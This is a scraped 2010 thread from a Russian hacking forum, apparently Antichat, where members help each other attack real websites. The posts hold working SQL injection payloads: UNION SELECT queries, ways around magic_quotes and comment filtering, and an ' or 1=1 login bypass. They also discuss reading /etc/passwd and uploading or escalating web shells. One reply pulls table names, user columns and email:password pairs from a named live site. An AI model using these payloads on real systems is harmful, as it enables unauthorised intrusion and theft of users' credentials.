Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
31.03.2010, 19:21
|
|
Участник форума
Регистрация: 13.04.2009
Сообщений: 121
Провел на форуме:
436858
Репутация:
33
|
|
да, file_priv:Y. /etc/passwd отлично читает. пытался найти через ошибки.
usr/local/www/apache22/data/http/avia/aeroport.php
пропуская все через hex. не открывает. ошибок не выводит. пытаюсь залить шелл через mysql. magic_quotes=on. почитал на ачате как обойти. не получается. |
|
|
31.03.2010, 20:07
|
|
Участник форума
Регистрация: 13.04.2009
Сообщений: 121
Провел на форуме:
436858
Репутация:
33
|
|
почитал статью https://forum.antichat.ru/showpost.php?p=663815&postcount=39
мой запрос
http://localhost/avia/aeroport.php?uid=-93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
все выводит. пытаюсь сделать через второй запрос, чтобы обойти magic_quotes.
заместо единицы вставляю hex кусок.
-93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
основной запрос проходит, второй с ошибками. вроде все правильно делаю. подскажите в чем моя ошибка. спасибо |
|
|
|
31.03.2010, 21:07
|
|
Познающий
Регистрация: 07.08.2009
Сообщений: 36
Провел на форуме:
257153
Репутация:
34
|
|
основной запрос проходит, второй с ошибками. вроде все правильно делаю. подскажите в чем моя ошибка. спасибо
-- -коментарий который отбрасывает конец запроса. /* */ - это окмментарий который отбрасывает середину
|
|
|
|
31.03.2010, 21:30
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Gorev
Собственно вопрос знатокам, есть шелл на сервере под виндой, права типо зеленые , но! ничего там не сделать ни править, ни закачать..., захожу в практически любую папку на серванте, нужен пароль от юзера БД (MYSQL), из конфигов вычитал другого юзверя но у него мало прав.Собственно хочу через пхпмайадмин залить другой шелл, может справами будет получше..или другие идейки как мне заполучить нормально работающий шелл
так у самого юзверя БД права файловые есть?
|
|
|
|
31.03.2010, 21:53
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от попугай
так у самого юзверя БД права файловые есть?
нет к сожаленью, если бы были то не спрашивал бы
|
|
|
|
31.03.2010, 21:59
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Gorev
нет к сожаленью, если бы были то не спрашивал бы
Ну тогда не зальешь. Да даже если бы и были права, и получилось бы залить php-шелл, то ты был бы в той же ситуации, что и сейчас - править, заливать не сможешь ничего. PHP под IIS(а там он судя по описанию) обычно сильно урезан в правах. Попробуй ливануть asp-шелл или coldfusion (если там стоит)
|
|
|
|
31.03.2010, 22:48
|
|
Участник форума
Регистрация: 13.04.2009
Сообщений: 121
Провел на форуме:
436858
Репутация:
33
|
|
Сообщение от Red_EYEs
-- -коментарий который отбрасывает конец запроса. /* */ - это окмментарий который отбрасывает середину
/* - у меня там не срабатывает при подстановке. т.е
-93+union+select+1,2/* не прокатит
|
|
|
|
31.03.2010, 22:49
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Есть админка: http://www.rbeurope.org/admin
Там два поля. При подстановке в логин ' or 1=1/* . Походу фильтруется /*.
Что можно еще сделать?
|
|
|
|
31.03.2010, 22:59
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от FlaktW
Есть админка: http://www.rbeurope.org/admin
Там два поля. При подстановке в логин ' or 1=1/* . Походу фильтруется /*.
Что можно еще сделать?
Если действительно фильтруеться слеш и нужно отбросить запрос, попробуй "--" или "--+" или ")--+", если там канечно в этом дело, посмотреть не могу.
Последний раз редактировалось Redwood; 31.03.2010 в 23:06..
|
|
|
|
31.03.2010, 22:59
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Код:
_http://www.rbeurope.org/afiseaza.php?id=20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,version%28%29,25,26,27--+
Таблицы:
Код HTML:
articole:butic_livrari:butic_optiuni:butic_zone:cat_activite:citizenships:county:docs:emails:events:eventsdetails:eventspictures:hotel_prices:imagini:institute:letters:limbi:livration:mesaje:mesaje_admin:mesaje_old:monede:newsletter:persons:pictures:plati:plati_backup:produse:registration_fees:rezervari_hotel:scroll:seminar:sess:specific:tari:users:users_backup
Код:
_http://www.rbeurope.org/afiseaza.php?id=20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,GROUP_CONCAT%28COLUMN_NAME%20SEPARATOR%200x3a%29%20,25,26,27+FROM%20information_schema.COLUMNS%20WHERE%20TABLE_NAME=0x7573657273--+
Колонки users:
Код HTML:
id:title:lastname:firstname:email:password:position:organization:postal_address:compl_address:zip_code:town:id_tari:id_citizenships:phone:fax:nametag_name:nametag_affiliation:reg_fees:dinner1:dinner2:flag:platit:valoare
Код:
_http://www.rbeurope.org/afiseaza.php?id=20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws%280x3a,email,password%29%20,25,26,27+FROM+users+limit+303,1--+
Кстати, не набирайте никто http://www.rbeurope.org/login.php 
Последний раз редактировалось Strilo4ka; 31.03.2010 в 23:21..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
